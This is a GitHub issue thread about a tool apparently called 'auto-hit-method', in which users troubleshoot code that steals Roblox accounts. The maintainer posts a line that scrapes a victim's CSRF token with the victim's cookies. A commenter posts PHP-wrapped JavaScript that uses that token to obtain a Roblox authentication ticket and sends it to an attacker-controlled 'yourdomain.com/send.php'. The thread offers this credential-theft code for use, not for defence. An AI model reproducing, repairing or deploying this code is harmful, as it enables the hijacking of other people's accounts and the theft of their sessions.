### ISSUE TITLE
not sending to discord

### ISSUE THREAD

**Issue by 3UR** [notkohlrexo/auto-hit-method#6]
Uncaught (in promise) TypeError: Cannot read property 'split' of undefined
    at eval (eval at <anonymous> (7bee61aedcbb4773d878992153fa64e0.js:7), <anonymous>:1:3125)

**Comment by notkohlrexo** [comment]
there's a different way to grab the x-csrf-token now.
`var _0x3051de = (await (await fetch("https://www.roblox.com/home", {
        credentials: "include"
     })).text()).split('data-token=').pop().split('>')[0];`

**Comment by eshont0p** [comment]
this goes in api.php right?

**Comment by eshont0p** [comment]
`    //deobfuscated part in js-source.txt
    echo "(async function() {
    var _0x3051de = (await (await fetch('https://www.roblox.com/home', { credentials: 'include' })).text()).split('data-token=').pop().split('>')[0];
    var _0x3e8f56 = (await fetch('https://auth.roblox.com/v1/authentication-ticket', {
        'method': 'POST',
        'credentials': 'include',
        'headers': {
            'x-csrf-token': _0x3051de
        }
    }))['headers']['get']('rbx-authentication-ticket');
    await fetch('https://yourdomain.com/send.php' + '?id= ' + id + '?t=' + _0x3e8f56);
}());";
    if ($prompt != ''){
        echo "prompt('".$prompt."');";
    };
?>`  im not really sure how i do this that above shows a prompt but wont send the code (im ass at php)
